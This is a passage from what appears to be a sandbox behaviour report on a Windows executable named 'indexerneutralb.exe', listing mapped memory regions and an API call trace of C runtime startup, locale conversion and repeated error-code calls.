0xe6924e0000 end_va = 0xe6925dffff entry_point = 0x0 region_type = private name = "private_0x000000e6924e0000" filename = "" Region: id = 4842 start_va = 0x7ff6da84c000 end_va = 0x7ff6da84dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6da84c000" filename = "" Region: id = 4843 start_va = 0x7fff9b010000 end_va = 0x7fff9b019fff entry_point = 0x7fff9b010000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 4862 start_va = 0x73910000 end_va = 0x73919fff entry_point = 0x73910000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4863 start_va = 0x7fff93940000 end_va = 0x7fff9394bfff entry_point = 0x7fff93940000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Thread: id = 529 os_tid = 0x498 [0252.344] GetStartupInfoW (in: lpStartupInfo=0xe68b02f9a0 | out: lpStartupInfo=0xe68b02f9a0*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutralb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0252.347] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7fff9c9a0000 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsAlloc") returned 0x7fff9c9c02a0 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsFree") returned 0x7fff9c9c23f0 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsGetValue") returned 0x7fff9c9b63c0 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsSetValue") returned 0x7fff9c9bd920 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="InitializeCriticalSectionEx") returned 0x7fff9c9c5620 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateEventExW") returned 0x7fff9c9c5580 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateSemaphoreExW") returned 0x7fff9c9c55e0 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetThreadStackGuarantee") returned 0x7fff9c9c0e10 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateThreadpoolTimer") returned 0x7fff9c9bf110 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetThreadpoolTimer") returned 0x7fff9f1fcb10 [0252.347] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7fff9f205790 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CloseThreadpoolTimer") returned 0x7fff9f1fea10 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateThreadpoolWait") returned 0x7fff9c9c28c0 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetThreadpoolWait") returned 0x7fff9f1fc470 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CloseThreadpoolWait") returned 0x7fff9f205410 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlushProcessWriteBuffers") returned 0x7fff9f2542f0 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7fff9f2395e0 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetCurrentProcessorNumber") returned 0x7fff9f253130 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetLogicalProcessorInformation") returned 0x7fff9c9c0fb0 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateSymbolicLinkW") returned 0x7fff9c9e2720 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetDefaultDllDirectories") returned 0x7fff9c76e7a0 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="EnumSystemLocalesEx") returned 0x7fff9c9e28e0 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CompareStringEx") returned 0x7fff9c9b6010 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetDateFormatEx") returned 0x7fff9c9e2a00 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetLocaleInfoEx") returned 0x7fff9c9c0310 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetTimeFormatEx") returned 0x7fff9c9e2bc0 [0252.348] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetUserDefaultLocaleName") returned 0x7fff9c9c25d0 [0252.349] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="IsValidLocaleName") returned 0x7fff9c9e2cd0 [0252.349] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="LCMapStringEx") returned 0x7fff9c9b6000 [0252.349] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetCurrentPackageId") returned 0x7fff9c7045e0 [0252.349] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetTickCount64") returned 0x7fff9c9b65a0 [0252.349] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0252.349] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0252.349] GetCurrentThreadId () returned 0x498 [0252.349] GetStartupInfoW (in: lpStartupInfo=0xe68b02f990 | out: lpStartupInfo=0xe68b02f990*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutralb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140000000, hStdOutput=0x1400069c8, hStdError=0xe68b0b10e0)) [0252.349] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0252.349] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0252.349] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0252.349] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\indexerneutralb.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"" [0252.349] GetEnvironmentStringsW () returned 0xe68b0b2070* [0252.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1316, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1316 [0252.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1316, lpMultiByteStr=0xe68b0b2ac0, cbMultiByte=1316, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1316 [0252.350] FreeEnvironmentStringsW (penv=0xe68b0b2070) returned 1 [0252.350] GetLastError () returned 0x7f [0252.350] SetLastError (dwErrCode=0x7f) [0252.350] GetLastError () returned 0x7f [0252.350] SetLastError (dwErrCode=0x7f) [0252.350] GetLastError () returned 0x7f [0252.350] SetLastError (dwErrCode=0x7f) [0252.350] GetACP () returned 0x4e4 [0252.350] GetLastError () returned 0x7f [0252.350] SetLastError (dwErrCode=0x7f) [0252.350] IsValidCodePage (CodePage=0x4e4) returned 1 [0252.350] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xe68b02f920 | out: lpCPInfo=0xe68b02f920) returned 1 [0252.350] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xe68b02f3c0 | out: lpCPInfo=0xe68b02f3c0) returned 1 [0252.350] GetLastError () returned 0x7f [0252.350] SetLastError (dwErrCode=0x7f) [0252.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xe68b02f3e0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0252.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xe68b02f3e0, cbMultiByte=256, lpWideCharStr=0xe68b02f0c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ᱗롂屳") returned 256 [0252.350] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ᱗롂屳", cchSrc=256, lpCharType=0xe68b02f6e0 | out: lpCharType=0xe68b02f6e0) returned 1 [0252.350] GetLastError () returned 0x7f [0252.350] SetLastError (dwErrCode=0x7f) [0252.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xe68b02f3e0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0252.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xe68b02f3e0, cbMultiByte=256, lpWideCharStr=0xe68b02f0b0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0252.350] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0252.350] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xe68b02eea0, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0252.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0xe68b02f4e0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿö", lpUsedDefaultChar=0x0) returned 256 [0252.350] GetLastError () returned 0x7f [0252.350] SetLastError (dwErrCode=0x7f) [0252.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xe68b02f3e0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0252.350] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xe68b02f3e0, cbMultiByte=256, lpWideCharStr=0xe68b02f0b0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0252.350] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0252.350] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xe68b02eea0, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0252.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0xe68b02f5e0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0252.350] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14001add0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutralb.exe" (normalized: "c:\\windows\\syswow64\\indexerneutralb.exe")) returned 0x27 [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.351] SetLastError (dwErrCode=0x0) [0252.351] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.352] SetLastError (dwErrCode=0x0) [0252.352] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 [0252.353] SetLastError (dwErrCode=0x0) [0252.353] GetLastError () returned 0x0 